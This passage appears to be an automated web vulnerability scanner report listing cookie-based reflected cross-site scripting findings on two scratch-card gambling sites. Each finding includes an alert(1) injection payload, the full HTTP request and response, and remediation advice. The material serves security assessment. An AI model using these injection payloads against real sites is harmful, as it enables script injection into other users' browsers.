Set-Cookie: ARC=130137634dd%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4ababbc828; expires=Tue, 15-May-2012 12:38:16 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137634dd--><script>alert(1)</script>f4ababbc828">
...[SNIP]...

3.137. http://primescratchcards.com/images/promotions.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f55e4'%3balert(1)//6af5e83356f was submitted in the ARC cookie. This input was echoed as f55e4';alert(1)//6af5e83356f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f55e4'%3balert(1)//6af5e83356f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137f55e4%27%3Balert%281%29%2F%2F6af5e83356f; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137f55e4';alert(1)//6af5e83356f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.138. http://primescratchcards.com/images/promotions.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4a0"%3balert(1)//d5f5fbe1a5d was submitted in the ARC cookie. This input was echoed as 8e4a0";alert(1)//d5f5fbe1a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/promotions.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378e4a0"%3balert(1)//d5f5fbe1a5d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378e4a0%22%3Balert%281%29%2F%2Fd5f5fbe1a5d; expires=Tue, 15-May-2012 12:38:14 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301378e4a0";alert(1)//d5f5fbe1a5d' border='0' width='1' height='1'>
...[SNIP]...

3.139. http://primescratchcards.com/images/terms.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7745f--><script>alert(1)</script>d768002612a was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377745f--><script>alert(1)</script>d768002612a; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377745f%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed768002612a; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377745f--><script>alert(1)</script>d768002612a">
...[SNIP]...

3.140. http://primescratchcards.com/images/terms.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d47"%3balert(1)//edab606af36 was submitted in the ARC cookie. This input was echoed as b7d47";alert(1)//edab606af36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b7d47"%3balert(1)//edab606af36; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137b7d47%22%3Balert%281%29%2F%2Fedab606af36; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137b7d47";alert(1)//edab606af36' border='0' width='1' height='1'>
...[SNIP]...

3.141. http://primescratchcards.com/images/terms.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 133fa'%3balert(1)//f7892ed5c0f was submitted in the ARC cookie. This input was echoed as 133fa';alert(1)//f7892ed5c0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/terms.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137133fa'%3balert(1)//f7892ed5c0f; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137133fa%27%3Balert%281%29%2F%2Ff7892ed5c0f; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137133fa';alert(1)//f7892ed5c0f&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.142. http://primescratchcards.com/images/underage.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload cb889--><script>alert(1)</script>7c8fb9ac580 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137cb889--><script>alert(1)</script>7c8fb9ac580; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137cb889%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7c8fb9ac580; expires=Tue, 15-May-2012 12:38:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137cb889--><script>alert(1)</script>7c8fb9ac580">
...[SNIP]...

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3da0'%3balert(1)//5a270d6e34e was submitted in the ARC cookie. This input was echoed as e3da0';alert(1)//5a270d6e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e3da0'%3balert(1)//5a270d6e34e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e3da0%27%3Balert%281%29%2F%2F5a270d6e34e; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137e3da0';alert(1)//5a270d6e34e&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85468"%3balert(1)//e0168fa7962 was submitted in the ARC cookie. This input was echoed as 85468";alert(1)//e0168fa7962 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013785468"%3balert(1)//e0168fa7962; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013785468%22%3Balert%281%29%2F%2Fe0168fa7962; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013785468";alert(1)//e0168fa7962' border='0' width='1' height='1'>
...[SNIP]...

3.145. http://scratch.co.uk/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36051"><script>alert(1)</script>f6746a21160 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24336051"><script>alert(1)</script>f6746a21160; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24336051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef6746a21160; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG', 'direct-173|193|214|24336051"><script>alert(1)</script>f6746a21160');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.146. http://scratch.co.uk/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 485c6"%3balert(1)//e22d61d7a59 was submitted in the affiliate cookie. This input was echoed as 485c6";alert(1)//e22d61d7a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243485c6"%3balert(1)//e22d61d7a59; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243485c6%22%3Balert%281%29%2F%2Fe22d61d7a59; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
xt/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG', 'direct-173|193|214|243485c6";alert(1)//e22d61d7a59');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               topprizes: '$1,000,000',
               
...[SNIP]...

3.147. http://scratch.co.uk/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce5d"><script>alert(1)</script>16e5937d22d was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=dce5d"><script>alert(1)</script>16e5937d22d; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=dce5d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E16e5937d22d; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('dce5d"><script>alert(1)</script>16e5937d22d', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.148. http://scratch.co.uk/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload 58c29><script>alert(1)</script>cfec32cd964 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29><script>alert(1)</script>cfec32cd964; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecfec32cd964; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:18 GMT; path=/
Content-Type: text/html
Content-Length: 11427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(1)//814391c744558c29><script>alert(1)</script>cfec32cd964', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.149. http://scratch.co.uk/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

